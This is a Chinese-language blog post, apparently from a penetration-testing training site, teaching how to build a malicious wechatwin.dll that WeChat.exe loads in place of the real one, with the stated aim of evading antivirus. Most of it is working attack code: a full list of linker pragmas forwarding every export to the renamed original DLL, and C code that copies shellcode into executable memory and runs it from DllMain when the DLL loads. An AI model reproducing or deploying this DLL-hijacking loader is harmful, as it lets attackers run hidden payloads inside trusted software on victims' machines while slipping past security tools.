白加黑源码免杀学习
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
概述
白程序:WeChat.exe
恶意dll:wechatwin.dll
制作流程
- 获取导出函数列表
#pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1") #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2") #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3") #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4") #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5") #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6") #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7") #pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8") #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9") #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10") #pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11") #pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12") #pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13") #pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14") #pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15") #pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16") #pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17") #pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18") #pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19") #pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20") #pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21") #pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22") #pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23") #pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24") #pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25") #pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26") #pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27") #pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28") #pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29") #pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30") #pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31") #pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32") #pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33") #pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34") #pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35") #pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")
shellcode写入内存加载
DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcode, first, 2);
memcpy(shellcode + 834, a, 2);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
DllMain执行jmp_shellcode
BOOL WINAPI
DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
HANDLE threadHandle;
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
// Create a thread and close the handle as we do not want to use it to wait for it
threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
CloseHandle(threadHandle);
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3180.html
moonsec 